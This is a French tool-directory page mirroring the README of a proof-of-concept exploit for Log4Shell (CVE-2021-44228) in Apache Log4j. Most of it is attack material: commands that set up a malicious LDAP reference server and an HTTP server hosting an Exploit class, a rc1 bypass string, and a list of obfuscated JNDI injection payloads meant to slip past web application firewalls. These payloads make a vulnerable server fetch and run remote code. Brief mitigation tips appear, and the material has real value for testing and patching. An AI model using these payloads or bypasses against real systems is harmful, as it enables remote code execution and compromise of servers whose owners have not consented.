Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228-Apache-Log4j-Rce — Preuve de concept d'exploit pour CVE-2021-44228 (Log4Shell) avec charges utiles d'injection JNDI, techniques de contournement WAF et intégration de scan passif pour Burp Suite. | Kitploit
Outils/GitHubGitHub/kannthu/cve-2021-44228-apache-log4j-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFTests d'IntrusionDéveloppement de Charges Utiles
GitHubkannthu/cve-2021-44228-apache-log4j-rce

CVE-2021-44228-Apache-Log4j-Rce

Preuve de concept d'exploit pour CVE-2021-44228 (Log4Shell) avec charges utiles d'injection JNDI, techniques de contournement WAF et intégration de scan passif pour Burp Suite.

Voir le dépôt
319il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44228(Apache Log4j Exécution de code à distance)

toutes les versions de log4j-core >=2.0-beta9 et <=2.14.1

Les versions 1.x présentent d'autres vulnérabilités, nous vous recommandons de mettre à jour vers la dernière version.

Avis de sécurité / Bulletins liés à Log4Shell (CVE-2021-44228)

Utilisation :

git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
# For Python2
python -m SimpleHTTPServer 8888 
# For Python3
python3 -m http.server 8888
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Exécutez enfin le projet, vous verrez votre calculatrice s'afficher localement.

Conseils:

Ne comptez pas sur une version récente de Java pour vous sauver. Mettez à jour Log4j (ou supprimez la recherche JNDI). Désactivez l'expansion (cela semble de toute façon une très mauvaise idée).

Contournement rc1

Par exemple :

${jndi:ldap://127.0.0.1:1389/ badClassName}

Contournement WAF

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

Ne faites pas confiance au pare-feu applicatif web.

Détails de la vulnérabilité

Les Lookups fournissent un moyen d'ajouter des valeurs à la configuration Log4j à des endroits arbitraires.

Lookups

Les méthodes pour provoquer la fuite dans finally

LogManager.getLogger().error()
LogManager.getLogger().fatal()

Méthode de vérification simple

Si vous souhaitez effectuer des tests en boîte noire, je vous suggère de faire du scan passif.

BurpLog4jScan

Amusez-vous !!! BurpLog4jScan.png

Stargazers au fil du temps

Stargazers over time

Télécharger l’outil